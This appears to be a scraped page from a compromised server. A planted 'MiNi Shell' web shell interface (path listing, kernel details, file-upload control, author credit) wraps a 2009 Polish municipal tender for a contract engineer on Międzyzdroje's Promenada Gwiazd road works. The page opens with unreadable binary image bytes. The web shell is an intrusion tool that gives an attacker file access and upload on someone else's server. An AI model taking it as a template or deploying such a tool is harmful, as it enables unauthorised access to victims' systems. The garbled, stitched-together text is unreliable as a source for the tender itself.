JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090902/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090902/301502-N-2009.html

<p class="kh_header"><b>Międzyzdroje: Pełnienie funkcji Inżyniera Kontraktu dla inwestycji pn. Wprowadzenie nowej formy turystycznego zagospodarowania Promenady Gwiazd w Międzyzdrojach realizowanej w ramach Regionalnego Programu Operacyjnego Województwa Zachodniopomorskiego na lata 2007 - 2013 
w zakresie :
Przebudowa drogi - ulicy Bohaterów Warszawy i ulicy Promenada Gwiazd na odcinku od ulicy Zdrojowej do granicy działki nr 299 obr. 20 (korty tenisowe przy ulicy Promenady Gwiazd) w tym budowa drogi, kanalizacji deszczowej i ściekowej, sieć wodociągowa wraz z przyłączami, oświetlenie ulicy, mała architektura.</b><br>
<b>Numer ogłoszenia: 301502 - 2009; data zamieszczenia: 02.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Międzyzdroje , ul. Książąt Pomorskich 5, 72-500 Międzyzdroje, tel. 091 3275652, faks 0913275630.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.miedzyzdroje.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inżyniera Kontraktu dla inwestycji pn. Wprowadzenie nowej formy turystycznego zagospodarowania Promenady Gwiazd w Międzyzdrojach realizowanej w ramach Regionalnego Programu Operacyjnego Województwa Zachodniopomorskiego na lata 2007 - 2013 
w zakresie :
Przebudowa drogi - ulicy Bohaterów Warszawy i ulicy Promenada Gwiazd na odcinku od ulicy Zdrojowej do granicy działki nr 299 obr. 20 (korty tenisowe przy ulicy Promenady Gwiazd) w tym budowa drogi, kanalizacji deszczowej i ściekowej, sieć wodociągowa wraz z przyłączami, oświetlenie ulicy, mała architektura..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest :
Pełnienie funkcji Inżyniera Kontraktu dla inwestycji p.n. Wprowadzenie nowej formy turystycznego zagospodarowania Promenady Gwiazd w Międzyzdrojach 
w zakresie :
Przebudowa drogi - ulicy Bohaterów Warszawy i ulicy Promenada Gwiazd na odcinku od ulicy Zdrojowej do granicy działki nr 299 obr. 20 (korty tenisowe przy ulicy Promenady Gwiazd)  w tym budowa drogi , kanalizacji deszczowej i ściekowej , sieć wodociągowa wraz z przyłączami, oświetlenie ulicy, mała architektura  wraz z włączeniem kanalizacji sanitarnych poprzez ulice Morską i Zdrojową w ulicę Krótką oraz odtworzenie ulicy Zdrojowej i Morskiej zgodnie z projektem technicznym .
Projekt p.n. Wprowadzenie nowej formy turystycznego zagospodarowania Promenady Gwiazd w Międzyzdrojach  realizowany będzie w ramach Regionalnego Programu Operacyjnego Województwa Zachodniopomorskiego na lata 2007 - 2013 . 
Przedmiot zamówienia obejmuje opracowanie dokumentacji o udzielenie zamówienia publicznego na wyłonienie Wykonawcy robót budowlanych , zarządzanie inwestycją, nadzorowanie robót budowlanych , rozliczenie inwestycji . 
Szczegółowy opis przedmiotu zamówienia stanowi zakres czynności ( zał. Nr 1 do umowy).
Dokumentacja projektowa  stanowi załącznik do Specyfikacji Istotnych Warunków  . 
Zamawiający dopuszcza zmiany postanowień zawartej umowy na warunkach określonych we wzorze umowy.
Wynagrodzenie za wykonanie przedmiotu  zamówienia jest wynagrodzeniem ryczałtowym ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający  wymaga wniesienia wadium  :
 Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 10 000,00  ,  
       słownie: dziesięć tysięcy zł. Wykonawca wnosi wadium w wybranej przez siebie,  
       wymienionej poniżej, formie:
       1/  w pieniądzu, przelewem na rachunek bankowy: przelewem bankowym - BGŻ S.A.  
            OR/SZCZECIN Oddział w Międzyzdrojach 38203000451110000000547180
             z adnotacją wadium na  INŻYNIERA KONTRAKTU  
       2/ w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - 
            kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
       3/  w gwarancjach bankowych, 
       4/  w gwarancjach ubezpieczeniowych 
       5/  w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2  
            ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju  
            Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
   Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania  
        na rachunku zamawiającego. 
   W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art.  
         45 i 46.
  W przypadku niezabezpieczenia  oferty jedną z określonych w niniejszej specyfikacji form  
        wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać  
        będzie odrzuceniu.

       Wadium wnoszone w formie :  w poręczeniach bankowych lub poręczeniach spółdzielczej  
       kasy oszczędnościowo - kredytowej , w gwarancji bankowej,  w gwarancji  
       ubezpieczeniowej należy złożyć w formie oryginału w kasie urzędu. Z treści  
       gwarancji(poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji Gwaranta.  
       Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela  
       Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np.  
        złożony  wraz z imienną pieczątką. Z treści gwarancji winno wynikać bezwarunkowe, na  
        każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą ,  
        zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w  
        okolicznościach określonych w art. 46 ust. 5  ustawy Prawo Zamówień Publicznych.

        Wadium musi obejmować cały okres związania ofertą (30 dni).
  
        Do oferty należy załączyć dowód wniesienia wadium np. kopia dokonanego przelewu, kopia  
        gwarancji.

        W przypadku składania oferty przez wykonawców wspólnie ubiegających się o zamówienie  
         w dokumencie wadialnym ( gwarancja, poręczenie) powinno być wskazane  w imieniu  
         jakich podmiotów wadium jest wnoszone.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie  
      warunków:
      1/ Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli  
           ustawy nakładają obowiązek posiadania takich uprawnień;
      2/ Posiadający niezbędną wiedzę i doświadczenie oraz dysponujący potencjałem technicznym  
          i osobami zdolnymi do wykonania zamówienia; lub którzy przedstawią pisemne 
          zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób  
           zdolnych do wykonania zamówienia tj. 
          
             a/  Wykonał  (zakończył) w okresie ostatnich 3 lat przed dniem wszczęcia  
                 postępowania,  a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie: -  
                 co najmniej 2  usługi polegające na nadzorowaniu zadań  w  zakresie  nadzoru budowy  
                 lub  przebudowy dróg lub ulic wraz z budową lub przebudową urządzeń infrastruktury  
                 technicznej , o wartości brutto Kontraktu (zadania) co najmniej  5 000 000,00 PLN i 
                 10 000 000,00 PLN , w tym co najmniej jeden współfinansowany ze środków Unii 
                 Europejskiej  wraz z  załączeniem dokumentów potwierdzających , że usługi zostały  
     wykonane należycie ,
b/  dysponuje  lub będzie dysponował osobami , które będą uczestniczyć w wykonaniu 
      zamówienia  wraz z informacjami na temat ich kwalifikacji zawodowych ,  
      doświadczenia i wykształcenia , niezbędnych do wykonania zamówienia, a także   
      zakresu wykonywanych przez nie czynności ,tj.:        
                 1. Inżynier Rezydent z doświadczeniem przy kierowaniu zespołem nadzoru na co  
                      najmniej 2 zadaniach obejmujących budowę lub przebudowę dróg lub ulic wraz z  
                      budową lub przebudową urządzeń infrastruktury technicznej, o wartości brutto co 
                      najmniej 5 000 000,00 PLN, w tym, co najmniej jeden współfinansowany ze 
          środków Unii Europejskiej posiadający uprawnienia budowlane do kierowania 
          robotami budowlanymi bez ograniczeń  w specjalności drogowej i wpis na listę 
          członków właściwej izby samorządu zawodowego   . 
      2. Inspektor nadzoru robót drogowych - posiadający uprawnienia budowlane do  
          kierowania robotami budowlanymi wykonywania nadzoru inwestorskiego w   
          specjalności drogowej  bez ograniczeń   i  wpis na listę członków właściwej izby 
          samorządu zawodowego  z doświadczeniem  przy pełnieniu  funkcji inspektora 
          nadzoru robót drogowych na co najmniej jednym  zadaniu  związanym z budową 
          lub przebudową dróg lub ulic o wartości brutto co  najmniej 3  000 000,00 PLN.

           Uwaga!
           Dopuszcza się łączenie funkcji Inżyniera Rezydenta z funkcją Inspektora nadzoru   
           robót drogowych, przy spełnieniu warunku opisanego w pkt. 1),
       3. Inspektor nadzoru robót w zakresie sieci: sanitarnych  - posiadający 
           uprawnienia budowlane do kierowania robotami budowlanymi   w specjalności 
           instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych , 
           gazowych, wodociągowych i   kanalizacyjnych  bez ograniczeń i  wpis na listę  
           członków właściwej izby  samorządu zawodowego  i z doświadczeniem przy  
           pełnieniu   funkcji inspektora   nadzoru   robót na co najmniej jednym zadaniu   
           związanym z  budową lub   przebudową  w/w sieci   wartości brutto co  najmniej 
           1.500. 000,00 PLN.
.       4. Inspektor nadzoru robót w zakresie sieci: elektrycznych i elektroenergetycznych - 
           posiadający uprawnienia budowlane do kierowania robotami budowlanymi 
           w specjalności instalacyjnej w zakresie  sieci, instalacji i urządzeń elektrycznych i  
           elektroenergetycznych bez ograniczeń  wpis na listę członków właściwej izby  
           samorządu zawodowego z  doświadczeniem przy pełnieniu funkcji inspektora 
           nadzoru robót na co najmniej  jednym zadaniu związanym z budową  lub 
           przebudową oświetlenia ulicznego i  jednym zadaniu związanym z budową i  
           przebudową linii kablowych.
       5. Specjalista d/s zieleni - posiadający doświadczenie w co najmniej w dwóch 
           nadzorach nad realizacją projektu zieleni
       6. Specjalista d/s rozliczeń (obmiarowiec ) - posiadający doświadczenie w rozliczaniu  
           co najmniej  dwóch zadań inwestycyjnych, w tym co najmniej jeden  
           współfinansowany ze  środków Unii Europejskiej o wartości 3.000.000, 00 zł 

        3/  Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
             Zamówienia tj. posiada  polisę, a w przypadku jej braku inny dokument   
             potwierdzając, że  wykonawca jest  ubezpieczony od odpowiedzialności cywilnej w 
             zakresie prowadzonej działalności w  wysokości 100.000,00 zł ( sto tysięcy zł).  

        4/  Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia.

 Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy:
        1/  nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa 
             zamówień publicznych opisanych w ppkt. 1.1 do 1.4.
         2/  podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 Prawa zamówień 
              publicznych.
Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie złożonych przez   
        wykonawców dokumentów.
 Zamawiający odrzuca ofertę jeżeli:
       1/  jest niezgodna z ustawą
       2/  jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z 
            zastrzeżeniem art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych.
       3/  jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu 
            nieuczciwej konkurencji 
       4/  zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,  
       5/  została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie 
            zamówienia.
       6/  zawiera błędy w obliczeniu ceny 
       7/  wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na   
             poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych 
       8/  jest nieważna na podstawie odrębnych przepisów, 
Ofertę wykonawcy wykluczonego uznaje się za odrzuconą

 Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o   
       dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku 
        granicznego - spełnia/niespełna..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 6.2.  W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej  
        działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa 
         zamówień publicznych składa następujące dokumenty:
 
6.2.1 Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji  
         działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub 
         zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6   
         miesięcy przed upływem terminu składania ofert.  
6.2.2.Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę,   
         o ile nie wynika to z przedstawionych dokumentów rejestrowych.  
6.2.3. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego 
          oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia 
          Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem 
          podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, 
          że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych 
          płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione 
          nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
 6.2.3.Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 
          Prawa zamówień publicznych.     

6.3.   W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy    
         i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do  
         wykonania zamówienia należy złożyć następujące dokumenty: 
 
6.3.1. Wykaz wykonanych ,  a w przypadku świadczeń okresowych lub ciągłych również 
          wykonywanych, dostaw lub usług  w okresie ostatnich trzech  lat przed wszczęciem   
           niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia 
           działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością 
           dostawom lub usługom  stanowiącym przedmiot zamówienia, z podaniem ich wartości 
           oraz daty i miejsca wykonania oraz załączenia dokumentów potwierdzających , że te 
           dostawy lub usługi zostały wykonane należycie tj. co najmniej 2  usługi polegające na 
           nadzorowaniu zadań  w  zakresie  nadzoru budowy  lub  przebudowy dróg lub ulic wraz z 
           budową lub przebudową urządzeń infrastruktury   technicznej , o wartości brutto    
           Kontraktu (zadania) co najmniej  5 000 000,00 PLN  i 10 000 000,00 PLN , w tym co     
           najmniej jeden współfinansowany ze środków Unii   Europejskiej . 

6.3.2.  Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą    
            uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji 
            zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a 
            także zakresu wykonywanych przez nie czynności oraz pisemne zobowiązania innych 
            podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie 
            tym wykonawca wskazał osoby, którymi będzie dysponował .
 6.3.3.  Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu 
            zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek  
            posiadania takich uprawnień tj.
           1/ Inżynier Rezydent z doświadczeniem przy kierowaniu zespołem nadzoru na co  
               najmniej 2 zadaniach obejmujących budowę lub przebudowę dróg lub ulic wraz z  
               budową lub przebudową urządzeń infrastruktury technicznej, o wartości brutto co 
               najmniej 5 000 000,00 PLN, w tym, co najmniej jeden współfinansowany ze 
   środków Unii Europejskiej posiadający uprawnienia budowlane do kierowania 
    robotami budowlanymi bez ograniczeń  w specjalności drogowej i wpis na listę 
    członków właściwej izby samorządu zawodowego   . 
2/ Inspektor nadzoru robót drogowych - posiadający uprawnienia budowlane do  
    kierowania robotami budowlanymi wykonywania nadzoru inwestorskiego w   
    specjalności drogowej  bez ograniczeń   i  wpis na listę członków właściwej izby 
    samorządu zawodowego  z doświadczeniem  przy pełnieniu  funkcji inspektora 
    nadzoru robót drogowych na co najmniej jednym  zadaniu  związanym z budową 
    lub przebudową dróg lub ulic o wartości brutto co  najmniej 3  000 000,00 PLN.
    Dopuszcza się łączenie funkcji Inżyniera Rezydenta z funkcją Inspektora nadzoru   
    robót drogowych, przy spełnieniu warunku opisanego w pkt. 1),
3/ Inspektor nadzoru robót w zakresie sieci: sanitarnych  - posiadający 
    uprawnienia budowlane do kierowania robotami budowlanymi   w specjalności 
    instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych , 
    gazowych, wodociągowych i   kanalizacyjnych  bez ograniczeń i  wpis na listę  
    członków właściwej izby  samorządu zawodowego  i z doświadczeniem przy  
     pełnieniu   funkcji inspektora   nadzoru   robót na co najmniej jednym  zadaniu  
     związanym z  budową lub   przebudową  w/w sieci   wartości brutto co  najmniej 
     1.500. 000,00 PLN.
.4/ Inspektor nadzoru robót w zakresie sieci: elektrycznych i elektroenergetycznych - 
     posiadający uprawnienia budowlane do kierowania robotami budowlanymi 
     w specjalności instalacyjnej w zakresie  sieci, instalacji i urządzeń elektrycznych i  
     elektroenergetycznych bez ograniczeń  wpis na listę członków właściwej izby  
     samorządu zawodowego z  doświadczeniem przy pełnieniu funkcji inspektora 
     nadzoru robót na co najmniej  jednym zadaniu związanym z budową  lub 
     przebudową oświetlenia ulicznego i  jednym zadaniu związanym z budową i  
                 przebudową linii kablowych. 
6.4.     W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji   
            ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć 
           następujące dokumenty: 
6.4.1  Polisa, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest 
          ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności w 
          wysokości 100.000,00 zł ( sto tysięcy zł).  

6.5.  Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:
6.5.1. Zamiast dokumentów, o których mowa w pkt  6.2.1 , 6.2.3  składa dokument lub  
         dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, 
          potwierdzające odpowiednio, że:
         1/ nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 
             miesięcy przed upływem terminu składania ofert.
         2/ nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i 
             zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie 
            na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego 
            organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania 
            ofert.
 
          Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub    
          miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt 6.5.1     
          zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, 
          właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego    
          lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca            
          ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach   
          określonych w niniejszym pkt 6.5.1 .   

6.6.   Dokumenty wymagane w przypadku składania oferty wspólnej: 
6.6.1  Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla 
          ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do 
          reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia 
          umowy.
          Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. 6.2.1, 6.2.2 , 6.2.3   dla 
          każdego partnera z osobna, pozostałe dokumenty składane są wspólnie   
          
6.7.    Postanowienia dotyczące składanych dokumentów
6.7.1. Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii  
           potwierdzonych za zgodność przez Wykonawcę lub osobę / osoby uprawnione do   
           podpisania  oferty z dopiskiem za zgodność z oryginałem.
           Pełnomocnictwo musi być złożone w formie oryginału lub kopii  
           poświadczonej za zgodność z oryginałem przez notariusza
6.7.2. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język 
          polski,   poświadczonym przez wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.miedzyzdroje.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Międzyzdroje ulica Ksiązat Pomorskich 5 72 -500 Międzyzdroje.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.09.2009 godzina 10:00, miejsce: w siedzibie zamawiającego  Gmina Międzyzdroje 
         Ulica Książąt Pomorskich 5 
         72 -500 Międzyzdroje 
          Pokój nr 10 -sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com